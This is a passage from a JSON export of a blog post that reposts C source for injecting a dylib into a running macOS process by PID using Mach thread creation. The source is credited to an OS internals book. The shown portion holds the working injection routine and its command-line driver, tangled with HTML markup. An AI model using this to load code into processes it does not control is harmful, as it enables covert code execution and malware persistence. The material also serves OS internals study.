(<\/span>u_int64_t)<\/span> remoteStack64;<\/span>\r\n#else<\/span>\r\n\r\n\t\/\/ Note the similarity - all we change are a couple of regs.<\/span>\r\n\tremoteThreadState64.<\/span>ash.<\/span>flavor =<\/span> ARM_THREAD_STATE64;<\/span>\r\n\tremoteThreadState64.<\/span>ash.<\/span>count =<\/span> ARM_THREAD_STATE64_COUNT;<\/span>\r\n\tremoteThreadState64.<\/span>ts_64.<\/span>__pc =<\/span> (<\/span>u_int64_t)<\/span> remoteCode64;<\/span>\r\n\tremoteThreadState64.<\/span>ts_64.<\/span>__sp =<\/span> (<\/span>u_int64_t)<\/span> remoteStack64;<\/span>\r\n\/\/ __uint64_t    __x[29];  \/* General purpose registers x0-x28 *\/<\/span>\r\n#endif<\/span>\r\n\r\n\tprintf<\/span> (<\/span>\"Remote Stack 64  0x%llx, Remote code is %p<\/span>\\n<\/span>\"<\/span>,<\/span> remoteStack64,<\/span> p );<\/span>\r\n\r\n\t\/*<\/span>\r\n\t * create thread and launch it in one go<\/span>\r\n\t *\/<\/span>\r\n#ifdef<\/span> X86_64\r\nkr =<\/span> thread_create_running<\/span>(<\/span> remoteTask,<\/span> x86_THREAD_STATE64,<\/span>\r\n(<\/span>thread_state_t)<\/span> &<\/span>remoteThreadState64,<\/span> x86_THREAD_STATE64_COUNT,<\/span> &<\/span>remoteThread );<\/span>\r\n#else<\/span> \/\/ __arm64__<\/span>\r\nkr =<\/span> thread_create_running<\/span>(<\/span> remoteTask,<\/span> ARM_THREAD_STATE64,<\/span> \/\/ ARM_THREAD_STATE64,<\/span>\r\n(<\/span>thread_state_t)<\/span> &<\/span>remoteThreadState64.<\/span>ts_64,<\/span> ARM_THREAD_STATE64_COUNT ,<\/span> &<\/span>remoteThread );<\/span>\r\n\r\n#endif<\/span>\r\n\r\nif<\/span> (<\/span>kr !=<\/span> KERN_SUCCESS)<\/span> {<\/span> fprintf<\/span>(<\/span>stderr,<\/span>\"Unable to create remote thread: error %s\"<\/span>,<\/span> mach_error_string<\/span> (<\/span>kr));<\/span>\r\n\t\t\t  return<\/span> (-<\/span>3<\/span>);<\/span> }<\/span>\r\n\r\nreturn<\/span> (<\/span>0<\/span>);<\/span>\r\n\r\n}<\/span> \/\/ end injection code<\/span>\r\n\r\n\r\n\r\nint<\/span> main<\/span>(<\/span>int<\/span> argc,<\/span> const<\/span> char<\/span> *<\/span> argv[])<\/span>\r\n{<\/span>\r\n if<\/span> (<\/span>argc <<\/span> 3<\/span>)<\/span>\r\n\t{<\/span>\r\n\t\tfprintf<\/span> (<\/span>stderr,<\/span> \"Usage: %s _pid_ _action_<\/span>\\n<\/span>\"<\/span>,<\/span> argv[<\/span>0<\/span>]);<\/span>\r\n\t\tfprintf<\/span> (<\/span>stderr,<\/span> \"   _action_: path to a dylib on disk<\/span>\\n<\/span>\"<\/span>);<\/span>\r\n\t\texit<\/span>(<\/span>0<\/span>);<\/span>\r\n\t}<\/span>\r\n\r\npid_t<\/span> pid =<\/span> atoi<\/span>(<\/span>argv[<\/span>1<\/span>]);<\/span>\r\nconst<\/span> char<\/span> *<\/span>action =<\/span> argv[<\/span>2<\/span>];<\/span>\r\nstruct<\/span> stat<\/span> buf;<\/span>\r\n\r\nint<\/span> rc =<\/span> stat<\/span> (<\/span>action,<\/span> &<\/span>buf);<\/span>\r\nif<\/span> (<\/span>rc ==<\/span> 0<\/span>)<\/span> inject<\/span>(<\/span>pid,<\/span>action);<\/span>\r\nelse<\/span>\r\n{<\/span>\r\n\tfprintf<\/span>(<\/span>stderr,<\/span>\"Dylib not found<\/span>\\n<\/span>\"<\/span>);<\/span>\r\n}<\/span>\r\n\r\n}<\/span>\r\n\r\n#if<\/span> 0<\/span>\r\n\r\n\r\ntatic void<\/span> con<\/span>()<\/span> __attribute__<\/span>((<\/span>constructor));<\/span>\r\n\r\nvoid<\/span> con<\/span>()<\/span> {<\/span>\r\n\r\n    printf<\/span>(<\/span>\"I'm a constructor<\/span>\\n<\/span>\"<\/span>);<\/span>\r\n\r\n}<\/span>\r\n\r\n#endif<\/span><\/pre>\n
 <\/p>\n
 <\/p>\n
 <\/p>\n
 <\/p>\n","protected":false},"excerpt":{"rendered":"
taken from :\u00a0http:\/\/newosxbook.com\/src.jl?tree=listings&file=inject.c this is an amazing injction Open Source for OSX   #include <dlfcn.h> #include <stdio.h> #include <unistd.h> #include <sys\/types.h> #include <mach\/mach.h> #include <mach\/error.h> #include <errno.h> #include <stdlib.h> #include <sys\/sysctl.h> #include <dlfcn.h> #include <sys\/mman.h> #include <sys\/stat.h> #include <pthread.h> #ifdef __arm64__ \/\/#include “mach\/arm\/thread_status.h” \/\/ Apple says: mach\/mach_vm.h:1:2: error: mach_vm.h unsupported \/\/ And I say, bullshit. … Continue reading Lib Injection code In OSX<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/posts\/65"}],"collection":[{"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=65"}],"version-history":[{"count":2,"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/posts\/65\/revisions"}],"predecessor-version":[{"id":67,"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/posts\/65\/revisions\/67"}],"wp:attachment":[{"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=65"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=65"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=65"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}